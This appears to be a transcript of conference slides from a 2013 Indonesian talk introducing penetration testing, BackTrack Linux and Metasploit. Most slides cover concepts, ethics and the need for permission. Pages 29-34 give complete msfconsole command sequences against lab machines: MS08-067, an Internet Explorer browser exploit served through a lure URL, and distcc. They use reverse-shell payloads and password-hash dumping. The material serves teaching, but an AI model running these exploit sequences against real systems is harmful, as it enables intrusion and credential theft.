Top Banner
PENETRATION TESTING AND METASPLOIT BASIC Presented by Syarif Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini
39

iCrOSS 2013_Pentest

Nov 22, 2014

Download

Technology

Syarif

[Slide] iCrOSS 2013_Pentest
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: iCrOSS 2013_Pentest

PENETRATION TESTING AND METASPLOIT BASIC

Presented by Syarif

!Indonesia Creative Open Source Software ( ICrOSS ) 2013

Jakarta, April 25 2013 Balai Kartini

Page 2: iCrOSS 2013_Pentest

Agenda

• Why & What’s Penetration Testing ( Pentest )

• << back|track basic overview

• Information Gathering & Port Scan ( Demo)

• Metasploit Basics & Meterpreter

• Challenge ;)

Page 3: iCrOSS 2013_Pentest

Whoami

• Just me my self : http://fl3x.us ; @fl3xu5

• InfoSec Enthusiast & Trainer

• Lecture & Assistant Manager

• CyberCrime Investigator

Page 4: iCrOSS 2013_Pentest

Why Pentest ?

• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)

• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)

Page 5: iCrOSS 2013_Pentest

What’s Penetration Testing

• A method to evaluate the security of computer system / network

• Practice ( attacking ) an IT System like a ‘hacker’ does

• Find security holes ( weaknesses )

• Bypass security mechanism

• Compromise an organization’s IT system security

Must have permission from IT system owner !

illegal activity put you in Jail

Page 6: iCrOSS 2013_Pentest

Ethics

• Think before act

• Don’t be stupid

• Don’t be malicious

Page 7: iCrOSS 2013_Pentest

Pentest Phases

Vulnerability Analysis

Information Gathering

Exploitation

Post Exploitation

Reporting

Page 8: iCrOSS 2013_Pentest

<< back|track overview

• .

The Most Advanced Linux Security Distribution

Open Source & Always be

Developed for Security Professional

Real World Pentesting Tools

Page 9: iCrOSS 2013_Pentest

<< back|track overview

• Watch the Video ! :)

Page 10: iCrOSS 2013_Pentest

<< back|track overview

Page 11: iCrOSS 2013_Pentest

<< back|track overview

Page 12: iCrOSS 2013_Pentest

What’s

• Not just a tool, but an entire framework *1)

• an Open source platform for writing security tools and exploits *2)

• Easily build attack vectors to add its exploits, payloads, encoders,

• Create and execute more advanced attack

• Ruby based

Page 13: iCrOSS 2013_Pentest

Metasploit interfaces

• MSFconsole

• MSFcli

• msfweb, msfgui ( discontinued )

• Metasploit Pro, Metasploit Express

• Armitage

Page 14: iCrOSS 2013_Pentest

MSFconsole

Page 15: iCrOSS 2013_Pentest

MSFcli

Page 16: iCrOSS 2013_Pentest

Metasploit Terminology

• Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1)

• Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1)

• Shellcode : a set of instructions used as payload when exploitation occurs *1)

• Module : a software that can be used by metasploit *1)

• Listener : a component for waiting an incoming connection *1)

Page 17: iCrOSS 2013_Pentest

How does exploitation works

attacker

exploit + payload

vulnerable server

1

exploit run , then payload run2

3 Upload / Download data

Page 18: iCrOSS 2013_Pentest

Traditional Pentest Vs Metasploit

Public Exploit Gathering

Change offsets

Replace ShellCode

Load Metasploit

Choose the target OS

Use exploit

SET Payload

Execute

Traditional Pentest Metasploit for Pentest

Page 19: iCrOSS 2013_Pentest

Meterpreter

• as a payload after vulnerability is exploited *1)

• Improve the post exploitation

Page 20: iCrOSS 2013_Pentest

Meterpreter

Exploiting a vulnerability

Select a meterpreter as a payload

meterpreter shell

Page 21: iCrOSS 2013_Pentest

Meterpreter command

Page 22: iCrOSS 2013_Pentest

Meterpreter command

Page 23: iCrOSS 2013_Pentest

Meterpreter command

Page 24: iCrOSS 2013_Pentest

Meterpreter command

Page 25: iCrOSS 2013_Pentest

Meterpreter command

Page 26: iCrOSS 2013_Pentest

Pentest Scenario

attacker vulnerable OS on VMware

* : Ubuntu 8.04 metasploitable

*

Page 27: iCrOSS 2013_Pentest

Pentest Skenario

• Set network adapter : NAT

• Firewall & Windows update : OFF

• Fresh OS installed

!

• startx

Page 28: iCrOSS 2013_Pentest

OS in the Lab• BackTrack 5 R 3

• IP address : 172.16.150.169

• Windows Xp SP 2

• IP address : 172.16.150.165

• Windows 2003 Server

• IP address : 172.16.150.167

• Windows 7

• IP address : 172.16.150.170

• Ubuntu Linux 8.04 ( Metasploitable )

• IP address : 172.16.150.171

Page 29: iCrOSS 2013_Pentest

Windows XP Exploitation

• msf > search windows/smb

• msf > info exploit/windows/smb/ms08_067_netapi

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > show payloads

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > exploit

• meterpreter > background

• session -l

Page 30: iCrOSS 2013_Pentest

Windows XP Post Exploitation

• session -i 1

• meterpreter > getsystem -h

• getuid

• hashdump

Page 31: iCrOSS 2013_Pentest

Windows 2003 Server Exploitation

• msf > search windows/smb

• msf > info exploit/windows/smb/ms08_067_netapi

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > show payloads

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > exploit

• meterpreter > background

• session -l

Page 32: iCrOSS 2013_Pentest

Windows 7 Exploitation• msf > use exploit/windows/browser/ms11_003_ie_css_import

• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms11_003_ie_css_import) > show options

• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169

• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80

• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi

• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169

• msf exploit(ms11_003_ie_css_import) > set LPORT 443

• msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi

Page 33: iCrOSS 2013_Pentest

Windows 7 Exploitation

• msf exploit(ms11_003_ie_css_import) > sessions -l

• msf exploit(ms11_003_ie_css_import) > sessions -i 1

• meterpreter > sysinfo

• meterpreter > shell

Page 34: iCrOSS 2013_Pentest

Ubuntu 8.04 Metasploitable Exploitation

• search distcc

• use exploit/unix/misc/distcc_exec

• show payloads

• set PAYLOAD cmd/unix/reverse

• show options

• set rhost 172.16.150.171

• set lhost 172.16.150.169

• exploit

Page 35: iCrOSS 2013_Pentest

Any Question ? Contact me

• Website : http://fl3x.us

• Twitter : @fl3xu5

Page 36: iCrOSS 2013_Pentest

Greet & Thanks To

• BackTrack Linux

• Metasploit Team ( HD Moore & rapid7 )

• Offensive Security / Metasploit Unleashed

• David Kennedy

• Georgia Weidman

Page 37: iCrOSS 2013_Pentest

References !

!

• 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni

• 2. http://www.metasploit.com

• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page

• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines

Page 38: iCrOSS 2013_Pentest

Challenge in 45 minutes :)

• Connect Your Windows OS to TP LINK Access Point over dhcp

• BackTrack 5R3 VMWare setting :

• Network adapter : Bridge

• Get 4 Pictures by your self & shutdown the targets ( if you can :p )

• Win the Polo T-Shirt indobacktrack

Page 39: iCrOSS 2013_Pentest

Challenge in 45 minutes :)